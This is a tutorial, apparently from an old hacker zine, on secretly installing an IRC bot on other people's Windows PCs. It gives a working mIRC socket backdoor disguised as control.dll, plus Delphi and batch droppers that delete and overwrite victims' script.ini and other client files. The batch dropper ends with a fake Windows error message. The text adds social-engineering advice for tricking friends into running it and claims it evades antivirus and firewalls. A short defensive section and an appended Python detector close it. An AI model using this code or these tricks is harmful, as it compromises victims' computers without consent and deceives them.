
Hanging a bot on Windows.



1. Intro.
2. Trojans.
3. mIRC scripts.
I. Writing your script backdoor
II. Writing a Delphi program that inserts the backdoor into the enemy's mIRC
III. Writing a batch program that inserts the backdoor into the enemy's mIRC
IV. Social engineering: pushing the program =)
4. Both ways in comparison.
5. How to protect yourself.
6. Outro.

1. These days it has become fashionable among owners of popular channels to hang a dozen bots from different Linux shells on a channel to ensure, so to speak, "channel security". Of course, I have nothing against Eggdrops, but what are mere mortal users to do, who have no shell, no ss, and no knowledge (such as the elite from channel #31337 on irc.dal.net.ru =)? So in this article I will tell you how to hang a bot on a machine with a Windows-like OS.
IMHO, there are only two ways to do this: Trojans and Trojans =) Let's start with the first.

2. If you were on MSN (irc.msn.com) before it closed, you probably got to enjoy the countless bots on the channels #russian_chat, #russian_girls, #russian_andybig and so on. These bots are far from Eggdrops. They are, so to speak, SubSevens. Heard of such a horse? Sub7 is the only Trojan I can remember that allowed you to remotely hang an IRC bot (I haven't used Trojans for a long time, so I don't know whether it has any analogues). So download Sub7 from here and enjoy. Those who are not used to looking for easy ways can read on.

3. The possibilities of mIRC scripts are very impressive. Writing a CGI scanner in them is trivial, not to mention a simple bot. Take the WarSatan script, for example. It is built around just such a "simple bot". When you connect to your favorite IRC server, the script connects a guest user to the irc.webchat.org server and joins it to the #CHATOP, #MEKAH and #PANGKOR channels. That is the whole mechanism. Our task is to write the same kind of simple backdoor in the form of an mIRC plugin.
I. I will comment on the most important lines.

on 1:CONNECT:{
;#open a connection to your irc server
.sockopen 31337 irc_server its_port
}
on 1:DISCONNECT:{
;#when the connection drops, kill the socket
.sockclose 31337
}
on 1:SOCKOPEN:31337:{
;#register on the irc server
.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
.sockwrite -n $sockname NICK bot_nick $+ $r(1,999)
;#join your channel
.sockwrite -n $sockname join your_channel
}
on 1:SOCKREAD:31337:{
;#this part automatically answers the server's ping
;#without it the server will drop the bot, because it does not answer pings
.sockread %tmp
if ($gettok(%tmp,1,32) == ping) {
.sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
}
}


We remove the comments, substitute our values, number the lines (just copy it all into the mIRC editor and save; it will number everything) and save the result as the file control.dll.
The backdoor itself is ready. Now it remains to insert it into someone else's script.ini.

II. Here is Delphi source code that looks for a script.ini file on the hard drive and, if the search succeeds, replaces it with ours.

Important! control.dll must be kept in the same directory as this program.

program Project1;

uses
SysUtils,
windows,
shellapi;


const search = 'script.ini'; //the file to find and replace
replace = 'control.dll'; //the replacement file; it must be in
// the same place this program is run from =)


var buf: array [0..255] of char;
fl: PChar;
flag:boolean = false;

//file replacement procedure
procedure Change(where:pchar);

function CopyFile(FromFile, ToDir : string) : boolean; //copy function
var F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
{$I-}
result:=ShFileOperation(F) = 0;
{$I+}
end;

begin
DeleteFile(where);
CopyFile(replace,where)
end;


//global search procedure
function Find(DirN: string):boolean;
var
tsr: TSearchRec;
Full: string;

begin
find:=false;
if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
repeat
if (tsr.Name = '.') or (tsr.Name = '..') then continue;
Full:= DirN + '\' + tsr.Name;
if tsr.Attr = faDirectory then //if it is a directory
Find(Full);
until (FindNext(tsr) <>0)or(tsr.Name = search)or flag;

if tsr.Name = search //if found
then begin
find:=true;
flag:=true;
Change(pchar(DirN+'\'+tsr.Name));
end;

end;


//Main program block
begin
if SearchPath(nil,search,nil,sizeof(buf),buf,fl)>0 then
Change(buf)
else
begin
Find('c:');
// if you also need to search other drives, you can do this:
// if Not Find('c:') then
// if Not Find('d:') then
// if Not Find('e:') then
//etc....
end;

end.


III. If you have never coded in your life and the word "compiler" makes you shudder, let's write such a program in batch.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

This thing searches at random for mIRC, NeoRa Trion and Looksharp. The probability of finding them is rather low, so it is desirable to persuade the subject to put this file, together with control.dll, in the same directory as their IRC client. If the search succeeds, the file replaces the victim's script.ini with our control.dll.
Convert this bat file to an exe with some bat2exec tool and you can push it to your friends.

IV. I think it's not for me to tell you how to "push" exe files on someone. I just want to emphasize one thing. Admit it: a request to run your exe makes even the most clueless user suspicious. So you can go the other way. To do this, go back to point I. Do NOT number the lines of the script; just put it in the file joke.mrc. That's all. Now distribute it to your friends with the words: put it in the directory with your mIRC, enter "/load -rs joke.mrc" in its console and enjoy all the pleasures of the plugin =)

4. So, what makes the script.ini replacement method better?
1) It is not caught by antivirus.
2) It is not caught by firewalls. I think many will immediately start arguing, foaming at the mouth, that ZoneAlarm and AtGuard will protect them from this. Especially for them I explain: if mIRC is registered in these two firewalls as an allowed server\client, the firewall will not make a peep when the backdoor opens its connection.
3) It is difficult to detect and kill, even for an experienced user.

5. And now about how to defend yourself. Again, I will not consider the Sub7 method (because with it everything is clear: AVP + ZoneAlarm); I will go straight to the second.
To detect a script backdoor, use an mIRC plugin such as IPSearch that searches the server for a user with the same IP as yours. If there is one, then someone has definitely hung a bot on you. If none is found, then either the bot is on another server, or you are clean.
You can also use the same ZoneAlarm to detect a bot: at the moment, the largest IRC servers check all clients for proxies. How? A simple port scan. So if you connect to the irc.some.com server and your ports are scanned by some irc.lame.com, you should start thinking ...
How to kill the backdoor? If you don't understand scripting, just reinstall the IRC client.
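A static check for the pattern from section 3, as an added example that is not part of the original article: it reads a remote script in script.ini form (numbered nN= lines) or plain .mrc form and flags a socket opened from a CONNECT handler together with IRC registration commands written over a socket. The sample scripts, the server name and the channel are constructed placeholders, and the two rules are an assumption about what to flag, not a complete detector.

```python
import re

# Constructed samples in script.ini form; server, nick and channel are placeholders.
SUSPECT = """[script]
n0=on 1:CONNECT:{
n1=.sockopen 31337 irc.example.net 6667
n2=}
n3=on 1:SOCKOPEN:31337:{
n4=.sockwrite -n $sockname USER BOT "" "localhost" :bot
n5=.sockwrite -n $sockname NICK bot $+ $r(1,999)
n6=.sockwrite -n $sockname join #example
n7=}
"""
BENIGN = """[script]
n0=on 1:TEXT:!time:#:{ msg $chan $time }
n1=on 1:CONNECT:{ echo -s connected }
"""

NUMBERED = re.compile(r"^n\d+=")                 # line prefix used in script.ini
EVENT = re.compile(r"^on\s+[^:]+:(\w+):", re.I)  # e.g. "on 1:CONNECT:"
RULES = {
    "sockopen": re.compile(r"(?:^|[\s{|])(\.?)sockopen\b", re.I),
    "irc-registration": re.compile(
        r"(?:^|[\s{|])(\.?)sockwrite\b.*\b(?:USER|NICK|JOIN)\b", re.I),
}

def scan(text):
    """Return (line_no, event, rule, silenced) for each flagged command."""
    findings, event, depth = [], None, 0
    for no, raw in enumerate(text.splitlines(), 1):
        line = NUMBERED.sub("", raw.strip())
        if not line or line.startswith(";"):
            continue  # blank line or script comment
        m = EVENT.match(line)
        if m:
            event = m.group(1).upper()
        for rule, rx in RULES.items():
            hit = rx.search(line)
            if hit:  # a leading "." makes mIRC run the command quietly
                findings.append((no, event, rule, hit.group(1) == "."))
        depth += line.count("{") - line.count("}")
        if depth <= 0:
            event, depth = None, 0  # handler body closed
    return findings

def hidden_session(findings):
    """True if a socket is opened on CONNECT and IRC registration goes over a socket."""
    opens = any(e == "CONNECT" and r == "sockopen" for _, e, r, _ in findings)
    return opens and any(r == "irc-registration" for _, _, r, _ in findings)
```

Run `scan()` over every file the client loads as a remote script, whatever its extension; the article's own payload is saved under a .dll name.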

6. Well, what can I say at the end? Do not use unfamiliar scripts and do not force others to do it =)